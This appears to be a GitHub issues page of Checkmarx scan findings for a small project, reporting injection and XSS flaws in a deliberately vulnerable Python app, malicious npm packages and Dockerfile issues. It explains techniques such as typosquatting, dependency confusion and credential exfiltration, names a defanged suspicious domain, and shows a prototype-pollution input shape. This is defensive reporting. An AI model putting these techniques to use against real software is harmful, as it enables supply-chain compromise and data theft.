hmmachadocx / small-project Goto Github PK

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2022-25927
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

Versions of the package ua-parser-js 0.7.30 through 0.7.32, and 0.8.1 through 1.0.32 are vulnerable to Regular Expression Denial of Service (ReDoS) via the "trim()" function.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 0.7.33

Checkmarx (SAST): Stored_XSS
Security Issue: Read More about Stored_XSS
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13

The method do_GET embeds untrusted data in generated output with write, at line 80 of /dsvw.py. This untrusted data is embedded into the output without proper sanitization or encoding, enabling an attacker to inject malicious code into the generated web-page.

The attacker would be able to alter the returned web page by saving malicious data in a data-store ahead of time. The attacker's modified data is then read from the database by the do_GET method with connection, at line 26 of /dsvw.py. This untrusted data then flows through the code straight to the output web page, without sanitization. 

This can enable a Stored Cross-Site Scripting (XSS) attack.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. connection: /dsvw.py[26,288]
    2. cursor: /dsvw.py[26,299]
    3. cursor: /dsvw.py[26,32]
    4. cursor: /dsvw.py[30,21]
    5. cursor: /dsvw.py[31,262]
    6. fetchall: /dsvw.py[31,269]
    7. row: /dsvw.py[31,251]
    8. row: /dsvw.py[31,246]
    9. _: /dsvw.py[31,237]
    10. _: /dsvw.py[31,234]
    11. format: /dsvw.py[31,209]
    12. append: /dsvw.py[31,237]
    13. CxComprehensionVar31_237: /dsvw.py[31,209]
    14. CxComprehensionVar31_237: /dsvw.py[31,237]
    15. join: /dsvw.py[31,190]
    16. format: /dsvw.py[31,185]
    17. append: /dsvw.py[31,251]
    18. CxComprehensionVar31_251: /dsvw.py[31,185]
    19. CxComprehensionVar31_251: /dsvw.py[31,251]
    20. join: /dsvw.py[31,166]
    21. format: /dsvw.py[31,160]
    22. content: /dsvw.py[31,21]
    23. content: /dsvw.py[78,71]
    24. content: /dsvw.py[80,41]
    25. format: /dsvw.py[80,38]
    26. encode: /dsvw.py[80,125]
    27. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS

Result #2:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. read: /dsvw.py[37,152]
    2. decode: /dsvw.py[37,159]
    3. content: /dsvw.py[37,21]
    4. content: /dsvw.py[78,71]
    5. content: /dsvw.py[80,41]
    6. format: /dsvw.py[80,38]
    7. encode: /dsvw.py[80,125]
    8. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS

Result #3:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. loads: /dsvw.py[35,42]
    2. str: /dsvw.py[35,31]
    3. content: /dsvw.py[35,21]
    4. content: /dsvw.py[78,71]
    5. content: /dsvw.py[80,41]
    6. format: /dsvw.py[80,38]
    7. encode: /dsvw.py[80,125]
    8. write: /dsvw.py[80,24]
    Review result in Checkmarx One: Stored_XSS

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0b414307-5d4b
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

Prototype Pollution vulnerability in lodash before 4.17.19.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: LOW
Availability impact: LOW
Remediation Upgrade Recommendation: 4.17.21

Checkmarx (SAST): Command_Injection
Security Issue: Read More about Command_Injection
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13

The application's do_GET method calls an OS (shell) command with envs, at line 57 of /dsvw.py, using an untrusted string with the command to execute.  

This could allow an attacker to inject an arbitrary command, and enable a Command Injection attack.

The attacker may be able to inject the executed command via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Result #1:
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    Review result in Checkmarx One: Command_Injection

Checkmarx (IaC-Security): Multiple RUN, ADD, COPY, Instructions Listed
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: NEW
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a

Multiple commands (RUN, Copy, And) should be grouped in order to reduce the number of layers.

Locations:

    File: /Dockerfile[0,0]
    Expected value: The 'Dockerfile' contains any 'USER' instruction
    Actual value: The 'Dockerfile' does not contain any 'USER' instruction"
    Review result in Checkmarx One: Multiple RUN, ADD, COPY, Instructions Listed

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2021-4229
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

A vulnerability was found in ua-parser-js 0.7.29, 0.8.0, and 1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 0.7.33

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2020-2875
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: MEDIUM
State: NOT_IGNORED
Status: NEW
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a

Additional Info
Attack vector: Network
Attack complexity: HIGH
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 2.10.5

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx6eb8ff4e-c9cf
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package communicates with a suspicious service commonly used by threat actors "https://rt11[.]ml"

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxbec87a55-fe55
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process, analysis is done at scale automatically via multiple engines. Once there's a risk suspicion, this is forwarded to a security researcher for a manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It's a common behavior for most of the malicious payloads to execute itself automatically upon installing or using the package.

While some dependency vulnerabilities have the privilege to be kept as known issue due to risk-management, same does not apply in the case of a malicious package, and it should be removed with the highest priority.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2021-23337
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

lodash and lodash-es prior to 4.17.21, are vulnerable to Command Injection via the "template" function. lodash.template versions are vulnerable, too.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxba94c01e-a95d
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package executes a crypto mining software

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes network and filesystem activity. In case a crypto mining behavior is detected, this risk is shown.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx9f739bef-35bb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package is using dependency confusion attack

About

Dependency Confusion is a technique discovered by @alex.birsan to hijack a privately used package by registering its name (if available) on a public registry with a higher version number. This may cause artifact servers and build tools to "confuse" and use the attacker's package.

For example, consider the following private package "my-company-utils" being hosted on a private artifact server:

In case an attacker targeting "my-company-utils" package, as long as it is not occupied by someone else on the official package manager, he's free to register it. If the attacker registers it and published with a very high version number such as "v99.99.99" most likely the automatic update logic and version comparisons functions will "confuse" and prefer using the attacker's package

As an addition step of mitigation, we recommend using our open-source tool as a CI step DustiLock

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2020-8203
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.

Additional Info
Attack vector: NETWORK
Attack complexity: HIGH
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2019-10744
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

A Prototype Pollution vulnerability was discovered in lodash prior to 4.17.12, in lodash.defaultsdeep prior to 4.6.1, and in @sailshq/lodash prior to 3.10.4. The function 'defaultsDeep' allows a malicious user to modify the prototype of Object via '{constructor: {prototype: {...}}}' causing the addition or modification of an existing property that will exist on all objects.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 4.17.21

Checkmarx (SAST): Code_Injection
SAST - CWE: CWE-94
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT

The application's do_GET method receives and dynamically executes user-controlled code using exec, at line 57 of /dsvw.py. This could enable an attacker to inject and run arbitrary code.

The attacker can inject the executed code via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]
    5. exec: /dsvw.py[57,21]

Checkmarx One
Review in Checkmarx: Code_Injection

Checkmarx (SAST): Information_Exposure1
SAST - CWE: CWE-547
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: RECURRENT

In getMd5, the application protects\302\240sensitive data using a cryptographic\302\240algorithm, getInstance, that is considered weak or even trivially broken, in /src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java at line 55.

Scan ID: 853146fc-fdfe-41da-acda-485e520b7041

Attack Vector

    1. passwordSalt: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[57,32]
    2. salted: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[57,12]
    3. salted: /src/main/java/org/owasp/webgoat/lessons/missingac/DisplayUser.java[59,29]

Checkmarx One
Review in Checkmarx: Information_Exposure1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxdca8e59f-8bfe
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

In NPM inflight there is a Memory Leak because some resources are not freed correctly after being used. It appears to affect all versions, as the issue was not addressed and no fix is found. NOTE: In the meantime, logdna-agent, a package that depends on inflight, has merged a commit to address this solely in their package (so it should be fixed in logdna-agent in versions 1.6.5 and later). Node-glob, a package that also depends on inflight, was also planning to address this by not using inflight after version 8 is released, but it is still being used.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx8079a3fb-ff1f
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx7401d0a9-2786
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info

Checkmarx (IaC-Security): Healthcheck Instruction Missing
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

Ensure that HEALTHCHECK is being used. The HEALTHCHECK instruction tells Docker how to test a container to check that it is still working

Locations:

Result #1:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
    File: /Dockerfile[3,0]
    Expected value: Dockerfile should contain instruction 'HEALTHCHECK'
    Actual value: Dockerfile doesn't contain instruction 'HEALTHCHECK'
    Review result in Checkmarx One: Healthcheck Instruction Missing

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about CVE-2017-1000048
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

the web framework using ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2, and v6.0.4 is vulnerable to a DoS. A malicious user can send a evil request to cause the web framework crash.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: NONE
Availability impact: HIGH
Remediation Upgrade Recommendation: 6.2.4

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx6bee2138-4df0
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process, analysis is done at scale automatically via multiple engines. Once there's a risk suspicion, this is forwarded to a security researcher for a manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It's a common behavior for most of the malicious payloads to execute itself automatically upon installing or using the package.

While some dependency vulnerabilities have the privilege to be kept as known issue due to risk-management, same does not apply in the case of a malicious package, and it should be removed with the highest priority.

Additional Info

Vulnerable Package issue exists @ GoModules-github.com/dgrijalva/jwt-go-v3.2.0 in branch main

Namespace: hmmachadocx
Repository: small-project
Repository Url: https://github.com/hmmachadocx/small-project.git
CxAST-Project: My-Test-Org/My-Repo-Name
CxAST platform scan: f7f10bde-1230-4049-b49d-62ce8be2e7ae
Branch: main
Application: small-project
Severity: HIGH
State: NOT_IGNORED
Status: NEW
CWE: CWE-284

Additional Info
Attack vector: Network
Attack complexity: HIGH
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 2.11.5

References
Advisory

Unpinned Package Version in Apk Add issue exists @ Dockerfile in branch feature/my-awesome-change

Package version pinning reduces the range of versions that can be installed, reducing the chances of failure due to unanticipated changes

Namespace: hmmachadocx
Repository: small-project
Repository Url: https://github.com/hmmachadocx/small-project
CxAST-Project: hmmachadocx/small-project
CxAST platform scan: ed30c36a-3e75-4b94-9cdc-8330b464ad48
Branch: feature/my-awesome-change
Application: small-project
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx21f588f7-f9cb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process, analysis is done at scale automatically via multiple engines. Once there's a risk suspicion, this is forwarded to a security researcher for a manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It's a common behavior for most of the malicious payloads to execute itself automatically upon installing or using the package.

While some dependency vulnerabilities have the privilege to be kept as known issue due to risk-management, same does not apply in the case of a malicious package, and it should be removed with the highest priority.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxa45b0853-bee2
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package name is similar to other popular package "moment"

About

Typosquatting attacks relies on user type errors being inputted into installation commands or manifest files.

For example, let's take the popular npm package moment which has tens of millions of weekly downloads.

A user would like use this package and assisting the npm install command like so:

npm install moment

However, sometimes users tend to do accidentally typos, so another user would write:

npm install momnet

In this case, if a package exists under the Typosquatting name, it will be fetched and used.

Attackers find this method effective and usually tend to copy the original functionality and metadata to avoid detection. Typosquatting is one way to mislead developers to download the wrong package and usually includes with a malicious payloads.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx4ca27ec0-0c96
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
7f986cd3c946f274cdec73f80b84855a77bc2a3c765d68897fbc42835629a5d5

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info

Checkmarx (SAST): Missing_HSTS_Header
SAST - CWE: CWE-346
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT

The web-application does not define an HSTS header, leaving it vulnerable to attack.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. send_header: /dsvw.py[76,18]

Checkmarx One
Review in Checkmarx: Missing_HSTS_Header

Checkmarx (SAST): Command_Injection
SAST - CWE: CWE-77
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT

The application's do_GET method calls an OS (shell) command with envs, at line 57 of /dsvw.py, using an untrusted string with the command to execute.  

This could allow an attacker to inject an arbitrary command, and enable a Command Injection attack.

The attacker may be able to inject the executed command via user input, get, which is retrieved by the application in the do_GET method, at line 56 of /dsvw.py.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. get: /dsvw.py[56,268]
    2. "HTTP_USER_AGENT": /dsvw.py[56,236]
    3. envs: /dsvw.py[56,50]
    4. envs: /dsvw.py[57,35]

Checkmarx One
Review in Checkmarx: Command_Injection

Checkmarx (SAST): Information_Exposure1
Security Issue: Read More about Information_Exposure1
Applications: App1, App2
Checkmarx Project: My-Test-Org/My-Repo-Name
Repository URL: https://github.com/hmmachadocx/small-project.git
Branch: main
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Scan ID: bfdb0fc0-6df8-4b56-9ace-89e458990d8a

In getMd5, the application protects\302\240sensitive data using a cryptographic\302\240algorithm, getInstance, that is considered weak or even trivially broken, in /src/main/java/org/owasp/webgoat/lessons/cryptography/HashingAssignment.java at line 55.

Checkmarx (SAST): Unsafe_Use_Of_Target_blank
Security Issue: Read More about Unsafe_Use_Of_Target_blank
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13

Using <a href="%s" target="_blank"> at line 63 of /dsvw.py, without correctly setting the "rel" attribute, or disassociating the new window from its parent, is an unsafe way of opening a new window.

Result #1:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. <a href=\"%s\" target=\"_blank\">: /dsvw.py[63,166]
    Review result in Checkmarx One: Unsafe_Use_Of_Target_blank

Result #2:
Severity: LOW
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">: /dsvw.py[10,1046]
    Review result in Checkmarx One: Unsafe_Use_Of_Target_blank

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxccd8b30c-808c
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package was manually inspected by a security researcher and flagged as malicious

About

Classifying malicious packages is an internal process, analysis is done at scale automatically via multiple engines. Once there's a risk suspicion, this is forwarded to a security researcher for a manual evaluation.

Attackers take advantage of the excessive trust in the open-source ecosystem and launch software supply chain attacks in the form of code packages.

The risk of having a package with a malicious payload is high. It's a common behavior for most of the malicious payloads to execute itself automatically upon installing or using the package.

While some dependency vulnerabilities have the privilege to be kept as known issue due to risk-management, same does not apply in the case of a malicious package, and it should be removed with the highest priority.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0b915a4a-2d97
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info

Checkmarx (IaC-Security): Unpinned Package Version in Apk Add
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

Package version pinning reduces the range of versions that can be installed, reducing the chances of failure due to unanticipated changes

Locations:

Result #1:
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT
    File: /Dockerfile[6,0]
    Expected value: RUN instruction with 'apk add ' should use package pinning form 'apk add ='
    Actual value: RUN instruction apk --no-cache add git python3 py-lxml && rm -rf /var/cache/apk/* does not use package pinning form
    Review result in Checkmarx One: Unpinned Package Version in Apk Add

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxcc09496a-59c8
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

js-yaml is vulnerable to Code Injection before 3.13.1. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have "toString" as key and JavaScript code as value are used as explicit mapping keys, this allows attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.

Additional Info
Attack vector: NETWORK
Attack complexity: LOW
Confidentiality impact: HIGH
Availability impact: HIGH
Remediation Upgrade Recommendation: 3.13.1

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx18e041aa-8a63
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

The malicious payload in this package has the ability to corrupt or destroy files on disk

About

File wiping or file destruction is a type of risk which usually done when attackers wish to cause harm. File destruction can be done in several ways such as:

• Recursively overwriting all files with random / static content
• Deleting all files
• Encrypting all files and deleting the encryption key

Additional Info

Checkmarx (SAST): Missing_HSTS_Header
Security Issue: Read More about Missing_HSTS_Header
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: 5bbab3d8-0efb-4e5c-ae07-05d01fb0fc13

The web-application does not define an HSTS header, leaving it vulnerable to attack.

Result #1:
Severity: MEDIUM
State: TO_VERIFY
Status: RECURRENT
Attack Vector:

    1. send_header: /dsvw.py[76,18]
    Review result in Checkmarx One: Missing_HSTS_Header

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx68e4da20-b53a
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package exfiltrates stored credentials and sensitive information

About

Data exfiltration may be done in numerous ways such as through HTTP requests, DNS tunneling, various webhooks and more. It is common by attackers to try to exfiltrate sensitive information such as:

• Credentials
• Environment variables
• SSH keys
• Authentication tokens
• Computer and operating system information
• Network settings

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxae9d1b09-2adb
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package executes a crypto mining software

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes network and filesystem activity. In case a crypto mining behavior is detected, this risk is shown.

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cxd55dbf56-4d06
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package downloads a harmful file.
File hash:
ea131cc5ccf6aa6544d6cb29cdb78130feed061d2097c6903215be1499464c2e

About

Using a dynamic analysis environment (also known as a Sandbox) we can monitor filesystem activity such as newly created files within the lifecycle of the code package.

Once new files are created, our technology analyzes each of the newly created files. In case a file is harmful, this risk is shown.

Additional Info

Checkmarx (SAST): Stored_XSS
SAST - CWE: CWE-79
Test: test
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: feature/my-awesome-change
Severity: HIGH
State: TO_VERIFY
Status: RECURRENT

The method do_GET embeds untrusted data in generated output with write, at line 80 of /dsvw.py. This untrusted data is embedded into the output without proper sanitization or encoding, enabling an attacker to inject malicious code into the generated web-page.

The attacker would be able to alter the returned web page by saving malicious data in a data-store ahead of time. The attacker's modified data is then read from the database by the do_GET method with connection, at line 26 of /dsvw.py. This untrusted data then flows through the code straight to the output web page, without sanitization. 

This can enable a Stored Cross-Site Scripting (XSS) attack.

Scan ID: 849ae697-ce7b-4bfd-8fe3-39c53ff6e3d4

Attack Vector

    1. connection: /dsvw.py[26,288]
    2. cursor: /dsvw.py[26,299]
    3. cursor: /dsvw.py[26,32]
    4. cursor: /dsvw.py[30,21]
    5. cursor: /dsvw.py[31,262]
    6. fetchall: /dsvw.py[31,269]
    7. join: /dsvw.py[31,166]
    8. format: /dsvw.py[31,160]
    9. content: /dsvw.py[31,21]
    10. content: /dsvw.py[78,71]
    11. content: /dsvw.py[80,41]
    12. format: /dsvw.py[80,38]
    13. encode: /dsvw.py[80,125]
    14. write: /dsvw.py[80,24]

Checkmarx One
Review in Checkmarx: Stored_XSS

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx0a21eeca-49b1
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

This package exfiltrates stored credentials and sensitive information

About

Data exfiltration may be done in numerous ways such as through HTTP requests, DNS tunneling, various webhooks and more. It is common by attackers to try to exfiltrate sensitive information such as:

• Credentials
• Environment variables
• SSH keys
• Authentication tokens
• Computer and operating system information
• Network settings

Additional Info

Checkmarx (SCA): Vulnerable Package
Vulnerability: Read More about Cx743605c8-a95e
Checkmarx Project: hmmachadocx/small-project
Repository URL: https://github.com/hmmachadocx/small-project
Branch: main
Scan ID: e3bb7690-f29e-4a30-90c7-5142ae2bda9e

There is a weak link between the package's listed metadata and the referenced Git repository "https://github.com/moment/moment"

About

Package managers often display traction statistics per code package based on it's related GitHub repository. This statistics helps developers to evaluate code packages.

The statistics displayed by the package managers do not go through any validation process. It can easily be falsified to mislead developers because of how this information is acquired.

As part of the package metadata analysis capabilities Checkmarx has, StarJacking engine verifies the authenticity of such Git repository references and in case it's a false reference, this risk is shown

Additional Info

Checkmarx (SCA): Vulnerable Package
SCA - CVS: https://devhub.checkmarx.com/cve-details/CVE-2020-2875
Applications: App1, App2
